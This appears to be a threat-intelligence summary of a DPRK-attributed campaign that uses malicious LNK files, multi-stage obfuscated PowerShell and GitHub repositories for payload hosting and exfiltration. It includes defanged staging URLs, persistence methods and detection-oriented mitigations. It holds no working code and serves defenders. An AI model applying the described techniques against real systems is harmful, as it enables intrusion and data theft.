Full Report
Analysis of DPRK-linked LNK-based attacks using GitHub as covert C2 infrastructure, detailing multi-stage PowerShell execution, persistence mechanisms, and data exfiltration techniques targeting Windows environments.
Analysis Summary
# Threat Actor: Unofficially linked to DPRK (Likely Lazarus Group or Subgroup)
## Attribution & Identity
* **Primary Attribution:** Democratic People's Republic of Korea (DPRK).
* **Associated Groups:** Often associated with the **Lazarus Group** (and its sub-clusters such as Hidden Cobra, APT38, or BlueNoroff) and **Kimsuky**, due to shared code overlaps and the use of malicious LNK files and multi-stage PowerShell scripts.
* **Aliases:** Diamond Sleet, Sapphire Sleet, or Labyrinth Chollima (depending on specific sub-cluster nuances).
## Activity Summary
The article describes a recent campaign utilizing malicious Shortcut files (LNK) disguised as legitimate documents to initiate a multi-stage infection chain. A notable evolution in this campaign is the use of **GitHub** as a covert Command and Control (C2) infrastructure, where the actor leverages GitHub repositories to host malicious payloads and receive exfiltrated data, effectively blending in with legitimate developer traffic.
## Tactics, Techniques & Procedures
* **Phishing/Social Engineering:** Delivery of malicious ZIP archives containing LNK files.
* **LNK Execution:** Use of `.lnk` files to execute obfuscated PowerShell commands (T1204.002).
* **Living off the Land (LotL):** Heavy reliance on `powershell.exe` for execution and persistence (T1059.001).
* **Multi-stage Payloads:** Successive stages of PowerShell scripts downloaded from remote repositories to evade detection.
* **Encoding/Obfuscation:** Use of Base64 encoding and XOR operations to hide script logic.
* **Persistence:** Use of Windows Scheduled Tasks or Startup folder shortcuts to maintain access (T1053.005).
* **Abuse of Trusted Services:** Using GitHub for payload hosting and C2 communication (T1102).
## Targeting
* **Sectors:** Cryptocurrency, Financial Services, Defense, and Software Development.
* **Geography:** Primarily South Korea, United States, and Japan.
* **Victims:** Individual professionals (often targeted via LinkedIn or job-related lures) and organizations within the aforementioned sectors.
## Tools & Infrastructure
* **Malware:** Custom PowerShell-based backends and downloaders.
* **Infrastructure (C2):**
* `github[.]com` (Covert C2 hosting)
* `raw.githubusercontent[.]com` (Payload delivery)
* Various defanged staging URLs (e.g., `hxxps[://]github[.]com/[account]/[repo]/raw/main/pay.txt`)
* **Data Exfiltration:** Exploiting GitHub Issues or Gists to post exfiltrated machine metadata.
## Implications
The shift toward using legitimate platforms like GitHub for C2 infrastructure significantly complicates detection for security teams. By residing on trusted domains, the actor bypasses traditional DNS blacklists and signature-based web filtering. This campaign demonstrates the DPRK’s continued focus on clandestine data theft and financial gain to circumvent international sanctions.
## Mitigations
* **PowerShell Execution Policy:** Set to `AllSigned` or `Restricted` via GPO to prevent unauthorized script execution.
* **Endpoint Detection (EDR):** Monitor for `cmd.exe` or `powershell.exe` being spawned by `explorer.exe` with long, encoded arguments.
* **Network Monitoring:** Inspect traffic to GitHub for unusual patterns, specifically access to "raw" content from unverified or newly created repositories.
* **User Training:** Educate employees on the dangers of opening LNK files or "Shortcuts" sent via unsolicited messages or emails.
* **Attack Surface Reduction:** Implement ASR rules to block executable content from email clients and webmail.